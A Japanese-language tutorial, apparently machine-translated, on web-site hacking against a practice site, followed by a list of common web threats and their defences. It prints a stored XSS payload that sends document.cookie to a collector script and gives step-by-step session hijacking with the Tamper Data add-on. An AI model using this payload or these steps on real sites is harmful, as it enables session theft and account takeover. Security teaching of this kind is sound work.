ウェブサイトをハッキングするには?一般的なサイトハッキング手法

ウェブサイトのハッキング手法

かつてないほど多くの人がインターネットにアクセスできるようになりました。 このため、多くの組織は、ユーザーが組織と対話するためにオンラインで使用できる Web ベースのアプリケーションを開発するようになりました。 Web アプリケーション用に適切に記述されていないコードが悪用されて、機密データや Web サーバーに不正にアクセスされる可能性があります。

このチュートリアルでは、Web サイトをハッキングする方法を学び、次のことを紹介します。 Webアプリケーションのハッキング手法とその対策 このような攻撃から保護するために導入できます。

ウェブサイトをハッキングする方法

この Web サイト ハッキングの実践的なシナリオでは、次の場所にある Web アプリケーションのユーザー セッションをハイジャックします。 www.techpanda.org。 クロスサイト スクリプティングを使用して Cookie セッション ID を読み取り、それを使用して正規のユーザー セッションになりすます。

想定されているのは、攻撃者が Web アプリケーションにアクセスでき、同じアプリケーションを使用する他のユーザーのセッションをハイジャックしたいということです。 この攻撃の目的は、攻撃者のアクセス アカウントが制限されていると仮定して、Web アプリケーションへの管理者アクセスを取得することである可能性があります。

ステップ1) URLを開く http://www.techpanda.org/.

練習のために、SQLインジェクションを使用してアクセスすることを強くお勧めします。こちらを参照してください。 記事 その方法について詳しくは、

ステップ2) ログイン詳細を入力します。

ログインメールアドレスは admin@google.com、パスワードはPassword2010です。

ステップ3) ダッシュボードを確認します。

ログインに成功すると、次のダッシュボードが表示されます。

ウェブサイトをハッキングする

ステップ4) 新しいコンテンツを入力します。

「新しい連絡先を追加」をクリックし、名として以下を入力します。

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

ステップ5) 追加 Javascript.

上記のコードは Javaスクリプト. onclick イベントを使用してハイパーリンクを追加します。。 何の疑いもしないユーザーがリンクをクリックすると、イベントによって PHP Cookie セッション ID を取得して、 snatch_sess_id.php ページと URL 内のセッション ID

ウェブサイトをハッキングする

ステップ6) 詳細を追加します。

残りの詳細を以下のように入力し、「変更を保存」をクリックします。

ウェブサイトをハッキングする

ステップ7) ダッシュボードを確認します。

ダッシュボードは次の画面のようになります

ウェブサイトをハッキングする

ステップ8) セッションIDを確認してください。

  • クロスサイトスクリプトのコードはデータベースに保存されるため、アクセス権のあるユーザーがログインするたびに読み込まれます。
  • 管理者がログインし、「Dark」というハイパーリンクをクリックしたとします。
  • URLにセッションIDが表示されたウィンドウが表示されます。
  • ウェブサイトをハッキングする

    注意: スクリプトが PHPSESSID が保存されているリモート サーバーに値を送信すると、ユーザーは何も起こらなかったかのように Web サイトにリダイレクトされてしまう可能性があります。

    注意: 取得される値は、この Web ページの値と異なる場合があります。 ハッキングのチュートリアルですが、コンセプトは同じです

    セッション偽装を使用する Firefox およびタンパーデータアドオン

    以下のフローチャートは、この演習を完了するために実行する必要がある手順を示しています。

    セッション偽装を使用する Firefox およびタンパーデータアドオン

    • 次のものが必要です。 Firefox このセクションの Web ブラウザーと Tamper Data アドオン
    • 店は開いています Firefox 以下の図に示すように、追加をインストールします。

    セッション偽装を使用する Firefox およびタンパーデータアドオン

    セッション偽装を使用する Firefox およびタンパーデータアドオン

    • タンパーデータを検索し、上記のようにインストールをクリックします。

    セッション偽装を使用する Firefox およびタンパーデータアドオン

    • 「同意してインストール…」をクリックします。

    セッション偽装を使用する Firefox およびタンパーデータアドオン

    セッション偽装を使用する Firefox およびタンパーデータアドオン

    • インストールが完了したら、「今すぐ再起動」をクリックします
    • のメニューバーを有効にする Firefox 表示されない場合

    セッション偽装を使用する Firefox およびタンパーデータアドオン

    • 以下に示すように、ツールメニューをクリックし、データの改ざんを選択します

    セッション偽装を使用する Firefox およびタンパーデータアドオン

    • 次のウィンドウが表示されます。注意: Windows 空ではありません。クリアボタンを押してください

    セッション偽装を使用する Firefox およびタンパーデータアドオン

    • 「タンパーの開始」メニューをクリックします
    • に切り替えます Firefox Web ブラウザ、タイプ http://www.techpanda.org/dashboard.php Enter キーを押してページをロードします
    • Tamper Dataから次のポップアップが表示されます。

    セッション偽装を使用する Firefox およびタンパーデータアドオン

    • ポップアップ ウィンドウには 3 つのオプションがあります。 改ざんオプションを使用すると、HTTP ヘッダー情報をサーバーに送信する前に変更できます。.
    • それをクリックしてください
    • 次のウィンドウが表示されます

    セッション偽装を使用する Firefox およびタンパーデータアドオン

    • コピー PHPセッションID 攻撃 URL からコピーし、等号の後に貼り付けます。値は次のようになります。
    PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
    • 「OK」ボタンをクリックします
    • タンパーデータポップアップウィンドウが再び表示されます

    セッション偽装を使用する Firefox およびタンパーデータアドオン

    • 「改ざんを続行しますか?」というチェックボックスをオフにします。
    • 完了したら送信ボタンをクリックしてください
    • 以下に示すようにダッシュボードが表示されるはずです。

    セッション偽装を使用する Firefox およびタンパーデータアドオン

    注意: ログインしていません。クロスサイト スクリプティングを使用して取得した PHPSESSID 値を使用してログイン セッションを偽装しました。

    Web アプリケーションとは何ですか? Web の脅威とは何ですか?

    Web アプリケーション (別名 Web サイト) は、クライアント/サーバー モデルに基づくアプリケーションです。の データベース アクセスとビジネス ロジックを提供します。これは Web サーバー上でホストされます。クライアント アプリケーションはクライアント Web ブラウザ上で実行されます。 Web アプリケーションは通常、次のような言語で記述されます。 Java、C#、VB.Net、PHP、ColdFusion マークアップ言語など、Web アプリケーションで使用されるデータベース エンジンには次のものがあります。 MySQL、MS SQL サーバー、 PostgreSQL, SQLite, etc.

    ウェブサイトのトップハッキング手法

    ほとんどの Web アプリケーションは、インターネット経由でアクセスできるパブリック サーバーでホストされています。そのため、簡単にアクセスできるために攻撃に対して脆弱です。次に、一般的な Web アプリケーションの脅威を示します。

    • SQLインジェクション – この脅威の目的は、ログイン アルゴリズムを回避したり、データを破壊したりすることなどである可能性があります。
    • サービス拒否攻撃– この脅威の目的は、正当なユーザーによるリソースへのアクセスを拒否することである可能性があります
    • クロスサイトスクリプティング XSS– この脅威の目的は、クライアント側のブラウザで実行できるコードを挿入することである可能性があります。
    • Cookie/セッションポイズニング– この脅威の目的は、攻撃者が Cookie/セッション データを変更して不正アクセスを取得することです。
    • フォームの改ざん – この脅威の目的は、攻撃者が商品を割引価格で入手できるように、電子商取引アプリケーションの価格などのフォーム データを変更することです。
    • コードの注入 – この脅威の目的は、PHP などのコードを挿入することです。 Pythonなど、サーバー上で実行できます。このコードにより、バックドアがインストールされたり、機密情報が漏洩したりする可能性があります。
    • 汚損– この脅威の目的は、Web サイトに表示されているページを変更し、すべてのページ リクエストを攻撃者のメッセージを含む単一のページにリダイレクトすることです。

    ウェブサイトをハッキングから守るにはどうすればよいですか?

    組織は、Web サーバー攻撃から自身を保護するために、次のポリシーを採用できます。

    • SQLインジェクション – ユーザーパラメータをデータベースに送信して処理する前にサニタイズおよび検証することで、次のような攻撃を受ける可能性を減らすことができます。 SQLインジェクション。 MS SQL Serverなどのデータベースエンジン、 MySQL、などはパラメータと準備されたステートメントをサポートします。従来の SQL ステートメントよりもはるかに安全です。
    • サービス拒否攻撃 – 攻撃が単純な DoS である場合、ファイアウォールを使用して、疑わしい IP アドレスからのトラフィックをドロップできます。 ネットワークと侵入検知システムを適切に構成することも、被害の可能性を減らすのに役立ちます。 DoS攻撃 成功しました。
    • クロスサイトスクリプティング – ヘッダー、URL 経由で渡されるパラメーター、フォーム パラメーター、および非表示の値を検証およびサニタイズすると、XSS 攻撃を減らすことができます。
    • Cookie/セッションポイズニング – これは、Cookie の内容を暗号化し、しばらくしてから Cookie をタイムアウトし、Cookie をその作成に使用されたクライアント IP アドレスに関連付けることによって防ぐことができます。
    • フォームテンパリング – これは、ユーザー入力を処理する前に検証および検証することで防ぐことができます。
    • コードインジェクション – これは、すべてのパラメータを実行可能コードではなくデータとして扱うことで防ぐことができます。 これを実装するには、サニタイズと検証を使用できます。
    • 汚損 – 優れた Web アプリケーション開発セキュリティ ポリシーでは、 Web サーバーにアクセスするために一般的に使用される脆弱性これは、Web アプリケーションを開発する際のオペレーティング システム、Web サーバー ソフトウェア、およびセキュリティのベスト プラクティスの適切な構成になります。
    これをチェックして: リンクがマルウェアから安全であることを確認するための 9 つの最適な URL スキャナー

    製品概要

    • Web アプリケーションはサーバー/クライアント モデルに基づいています。 クライアント側は Web ブラウザを使用してサーバー上のリソースにアクセスします。
    • Web アプリケーションは通常、インターネット経由でアクセスできます。 これにより、攻撃に対して脆弱になります。
    • Web アプリケーションの脅威には、SQL インジェクション、コード インジェクション、XSS、改ざん、Cookie ポイズニングなどが含まれます。
    • Web アプリケーションを開発する際に適切なセキュリティ ポリシーを適用すると、Web アプリケーションを安全にすることができます。